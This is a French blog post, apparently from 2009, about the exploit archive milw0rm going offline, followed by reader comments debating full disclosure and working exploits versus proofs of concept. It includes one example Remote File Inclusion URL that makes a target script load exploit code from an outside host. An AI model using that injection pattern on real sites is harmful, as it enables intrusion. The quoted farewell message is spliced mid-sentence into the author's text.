Il n'y a pas d'informations particulières expliquant la raison de ce retour on-line.
Ce que je disais sur l'importance de ce site reste bien entendu valable.
--
Milw0rm est un site des années 90 qui a existé jusqu'à aujourd'hui.
Il agrégeait tout type de failles de sécurité, en les rendant accessible gratuitement.
C'était un outil intéressant à plus d'un titre. Bien que permettant à tous les hackers en herbe de télécharger et tester les exploits, il permettait aussi d'une part aux équipes de sécurité d'analyser ces exploits et d'autre part, du fait de leur diffusion, de sensibiliser les équipes informatiques aux problématiques de sécurité.
Les attaques étaient de plus directement exploitables pour la plupart, notemment
celle de Remote File Inclusion qui contenaient l'exploit fonctionnel, directement appelable depuis sa page. Ainsi, nous pouvions lancer une attaque
http://site/web/script.php?var=http://www.milw0rm.com/exploits/1234
Plusieurs scripts offensifs permettaient d'ailleurs d'appeler directement le site milw0rm par son numéro d'exploit, preuve s'il en est de son efficacité.
Ce site a fermé aujourd'hui, le 9 juillet.
L'auteur (str0ke) a simplement laissé un message laissant entendre qu'il n'avait plus suffisement de temps à accorder à ce site web:
"Well, this is my goodbye header for milw0rm. I wish IJe pense qu'il est dommage que ce genre de site ferme, nous avons aujourd'hui de plus en plus de marchandisation d'exploits, ce qui n'est pas forcément de bon augure.
had the time I did in the past to post exploits, I just
don't :(. For the past 3 months I have actually done
a pretty crappy job of getting peoples work out fast
enough to be proud of, 0 to 72 hours (taking off
weekends) isn't fair to the authors on this site. I
appreciate and thank everyone for their support
in the past.
Be safe, /str0ke"
Le blog de sid en a plusieurs fois parlé, les failles de sécurité se monnayent aujourd'hui. Je repense au fameux "no more free bugs".
Lors de l'ouverture de milw0rm les failles de sécurité étaient cherchées comme un jeu et servaient de faire valoir à l'auteur. Encore une fois, je peux reciter le fameux "Smashing the stack for fun and profit" d'Aleph One. Smashing the stack, tout d'abord "for fun".
Aujourd'hui, ne reste t'il plus que le profit, sans fun?
Il reste surtout les kiddies. Les exploits fonctionnels ne servent dans 80% des cas qu'aux sk.
RépondreSupprimerQuand aux spécialistes en sécurité qui auraient besoin d'une preuve, la plupart du temps elle est suffisante sous forme de PoC.
Et le spécialiste en question, s'il comprend le PoC et qu'il a besoin du sploit (pen-test ou autre) il l'aura codé bien avant que str0ke modère l'envoi sur son site (et je suis sur qu'il marchera 10x mieux).
Comme indiqué, il reste l'aspect sensibilisation.
RépondreSupprimerLorsqu'on exhibe un exploit fonctionnel, ne demandant aucune compétence, et disponible immédiatement, on a plus de chances d'être écouté que de parler dans l'hypothétique.
Le fameux discours qui dit "je suis sûr que le réseau/système est vulnérable, mais je ne sais pas comment" reste bien souvent lettre morte.
PoC != Exploit
RépondreSupprimerEt t'as pas besoin de te faire entendre par la planète entière quand tu releases un advisory. Le vendeur, et dans ce cas là tu peux lui envoyer directement, pas besoin de passer par packetst0rm.
Et à partir du moment où il y a un patch, ya plus besoin de prouver quoique ce soit avec un sploit fonctionnel.
Comme je le disais avant, ceux qui en ont vraiment besoin sauront le faire tout seul.
Sauf si ce que tu cherches c'est la renommée. Et dans ce cas faut pas tenir un discours "je suis là pour sécuriser mon voisin".
Je ne dis pas qu'il n'existe pas de cas particuliers. Mais là c'est devenu complètement n'importe quoi. C'est la course au release de tool/sploit.